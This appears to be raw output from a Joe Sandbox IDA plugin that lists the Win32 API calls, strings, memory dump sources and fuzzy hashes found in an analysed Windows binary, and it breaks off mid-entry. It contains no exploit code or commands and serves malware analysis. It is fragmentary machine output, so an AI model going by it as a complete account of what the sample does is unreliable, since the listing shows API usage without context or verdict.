                                                                                                                                  • API String ID: 4237274167-1221869570
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00EE10B8
                                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00EE10EE
                                                                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00EE10FF
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EE1181
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                  • String ID: DllGetClassObject
                                                                                                                                  • API String ID: 753597075-1075368562
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EE5A93
                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00EE5AAF
                                                                                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00EE5AF5
                                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F618F0,00000000), ref: 00EE5B3E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 1173514356-4108050209
                                                                                                                                  APIs
                                                                                                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 00F00478
                                                                                                                                    • Part of subcall function 00EA7F40: _memmove.LIBCMT ref: 00EA7F8F
                                                                                                                                    • Part of subcall function 00EAA2FB: _memmove.LIBCMT ref: 00EAA33D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$BuffCharLower
                                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                                  • API String ID: 2411302734-567219261
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EDC684
                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EDC697
                                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EDC6C7
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 458670788-1403004172
                                                                                                                                  APIs
                                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EF4A60
                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EF4A86
                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EF4AB6
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00EF4AFD
                                                                                                                                    • Part of subcall function 00EF56A9: GetLastError.KERNEL32(?,?,00EF4A2B,00000000,00000000,00000001), ref: 00EF56BE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1951874230-3916222277
                                                                                                                                  APIs
                                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F1454E
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • _memset.LIBCMT ref: 00EA3965
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EA39B5
                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EA39C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                  • String ID: Line:
                                                                                                                                  • API String ID: 3942752672-1585850449
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EBC657
                                                                                                                                    • Part of subcall function 00EBC619: GetStockObject.GDI32(00000011), ref: 00EBC66B
                                                                                                                                    • Part of subcall function 00EBC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EBC675
                                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F08F69
                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00F08F70
                                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F08F85
                                                                                                                                  • DestroyWindow.USER32(?), ref: 00F08F8D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                  • API String ID: 4146253029-1011021900
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00EEE392
                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00EEE3E6
                                                                                                                                  • __swprintf.LIBCMT ref: 00EEE3FF
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F3DBF0), ref: 00EEE43D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                  • String ID: %lu
                                                                                                                                  • API String ID: 3164766367-685833217
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                    • Part of subcall function 00EDD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EDD640
                                                                                                                                    • Part of subcall function 00EDD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDD653
                                                                                                                                    • Part of subcall function 00EDD623: GetCurrentThreadId.KERNEL32 ref: 00EDD65A
                                                                                                                                    • Part of subcall function 00EDD623: AttachThreadInput.USER32(00000000), ref: 00EDD661
                                                                                                                                  • GetFocus.USER32 ref: 00EDD7FB
                                                                                                                                    • Part of subcall function 00EDD66C: GetParent.USER32(?), ref: 00EDD67A
                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00EDD844
                                                                                                                                  • EnumChildWindows.USER32(?,00EDD8BA), ref: 00EDD86C
                                                                                                                                  • __swprintf.LIBCMT ref: 00EDD886
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                  • String ID: %s%d
                                                                                                                                  • API String ID: 1941087503-1110647743
                                                                                                                                  • Opcode ID: 713572e3e125a1e7ca3dc49af0a02d756f29404946c88ae6fcdca8d2ffbf0581
                                                                                                                                  • Instruction ID: b0fd83c2b2c6db460e632e91c002ee466daf7a48aa6ac60cde70c9bb9fa9a7cc
                                                                                                                                  • Opcode Fuzzy Hash: 713572e3e125a1e7ca3dc49af0a02d756f29404946c88ae6fcdca8d2ffbf0581
                                                                                                                                  • Instruction Fuzzy Hash: DB11D6755042096BDF21BF50CC86FEA3BADEF44704F0090BAFE19BA246CB7499469B70
                                                                                                                                  APIs
                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F018E4
                                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F01917
                                                                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F01A3A
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00F01AB0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2364364464-0
                                                                                                                                  • Opcode ID: e9ea0509c7523db57633dd2f0cdc8d47c8432b659ab4739148ddc4d820833f36
                                                                                                                                  • Instruction ID: da14dd0a7297150143fa6be9b2472a0918a20b09f732e1035acd685ce274ee5d
                                                                                                                                  • Opcode Fuzzy Hash: e9ea0509c7523db57633dd2f0cdc8d47c8432b659ab4739148ddc4d820833f36
                                                                                                                                  • Instruction Fuzzy Hash: D8819470A50214ABDF209F64C886BAEBBE5BF48720F148059F915BF3C2D7B4E9419B90
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00F005DF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00F0066E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F0068C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00F006D2
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 00F006EC
                                                                                                                                    • Part of subcall function 00EBF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00EEAEA5,?,?,00000000,00000008), ref: 00EBF282
                                                                                                                                    • Part of subcall function 00EBF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00EEAEA5,?,?,00000000,00000008), ref: 00EBF2A6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 327935632-0
                                                                                                                                  • Opcode ID: f5e956910aacdfdddb92479961da56b5c1dba6757dcfec3a89b2697cc64f8bb4
                                                                                                                                  • Instruction ID: 491bbbb9675ab27d870df9cee3b1cd58989e34ee0d548265f0d55eb22c4236da
                                                                                                                                  • Opcode Fuzzy Hash: f5e956910aacdfdddb92479961da56b5c1dba6757dcfec3a89b2697cc64f8bb4
                                                                                                                                  • Instruction Fuzzy Hash: 04515876A002099FCB00EFA8C891AEDBBF5AF4D310F148065E915AB3A1DB31ED15EB50
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                    • Part of subcall function 00F03AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F02AA6,?,?), ref: 00F03B0E
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F02DE0
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F02E1F
                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F02E66
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00F02E92
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F02E9F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3440857362-0
                                                                                                                                  • Opcode ID: f52e17c0b69b92dd3453c0a028d33e1e87fd663fd451915fc3b7c9eb4c3f7200
                                                                                                                                  • Instruction ID: 76b54f4a4737ab9fb2e54837405ecbbd7ba2728ee047c505fb4ca76d75521be4
                                                                                                                                  • Opcode Fuzzy Hash: f52e17c0b69b92dd3453c0a028d33e1e87fd663fd451915fc3b7c9eb4c3f7200
                                                                                                                                  • Instruction Fuzzy Hash: E7515D72608204AFC744EF64CC85F6AB7E8FF89314F14481EF5969B1A1DB31E905EB62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dfeb43a634e136b3f8d6bedc08a415c407bd6201138d092e332a0503678e9689
                                                                                                                                  • Instruction ID: edc5c17472403da82c220da19b1edfaa52e1f9708f3bc5598797cd684da08f3d
                                                                                                                                  • Opcode Fuzzy Hash: dfeb43a634e136b3f8d6bedc08a415c407bd6201138d092e332a0503678e9689
                                                                                                                                  • Instruction Fuzzy Hash: B941DE76D00148ABEB20DB28CC49FA9BBA9FB49320F154355E919A72D1C770AD01FA90
                                                                                                                                  APIs
                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EF17D4
                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EF17FD
                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EF183C
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EF1861
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EF1869
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1389676194-0
                                                                                                                                  • Opcode ID: 93f23338c60d14c5790dd6e857b2c2852f4f5039b6c07e1554696556f2013287
                                                                                                                                  • Instruction ID: 6adf5b183d1c18a235e4871ec7aadae4903cb1e4fb4c10fbcb814bce78b49e7f
                                                                                                                                  • Opcode Fuzzy Hash: 93f23338c60d14c5790dd6e857b2c2852f4f5039b6c07e1554696556f2013287
                                                                                                                                  • Instruction Fuzzy Hash: 62412635A00209DFDB11EF64CA81AADBBF5EF0D314B149099E909BB3A1DB31ED01DB61
                                                                                                                                  APIs
                                                                                                                                  • GetCursorPos.USER32(000000FF), ref: 00EBB749
                                                                                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 00EBB766
                                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00EBB78B
                                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00EBB799
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4210589936-0
                                                                                                                                  APIs
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00EDC156
                                                                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00EDC200
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EDC208
                                                                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00EDC216
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EDC21E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3382505437-0
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00EDE9CD
                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EDE9EA
                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EDEA22
                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EDEA48
                                                                                                                                  • _wcsstr.LIBCMT ref: 00EDEA52
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3902887630-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F0DCC0
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F0DCE4
                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F0DCFC
                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00F0DD24
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00EF407D,00000000), ref: 00F0DD42
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2294984445-0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EDCA86
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EDCAB8
                                                                                                                                  • __itow.LIBCMT ref: 00EDCAD0
                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EDCAF6
                                                                                                                                  • __itow.LIBCMT ref: 00EDCB07
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$__itow$_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2983881199-0
                                                                                                                                  APIs
                                                                                                                                  • IsWindow.USER32(00000000), ref: 00EF89CE
                                                                                                                                  • GetForegroundWindow.USER32 ref: 00EF89E5
                                                                                                                                  • GetDC.USER32(00000000), ref: 00EF8A21
                                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00EF8A2D
                                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00EF8A68
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4156661090-0
                                                                                                                                  APIs
                                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EBB5EB
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00EBB5FA
                                                                                                                                  • BeginPath.GDI32(?), ref: 00EBB611
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00EBB63B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                  APIs
                                                                                                                                  • __calloc_crt.LIBCMT ref: 00EC2E81
                                                                                                                                  • CreateThread.KERNEL32(?,?,00EC2FB7,00000000,?,?), ref: 00EC2EC5
                                                                                                                                  • GetLastError.KERNEL32 ref: 00EC2ECF
                                                                                                                                  • _free.LIBCMT ref: 00EC2ED8
                                                                                                                                  • __dosmaperr.LIBCMT ref: 00EC2EE3
                                                                                                                                    • Part of subcall function 00EC889E: __getptd_noexit.LIBCMT ref: 00EC889E
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                  APIs
                                                                                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EDB903
                                                                                                                                  • GetLastError.KERNEL32(?,00EDB3CB,?,?,?), ref: 00EDB90D
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00EDB3CB,?,?,?), ref: 00EDB91C
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00EDB3CB), ref: 00EDB923
                                                                                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EDB93A
                                                                                                                                  Similarity
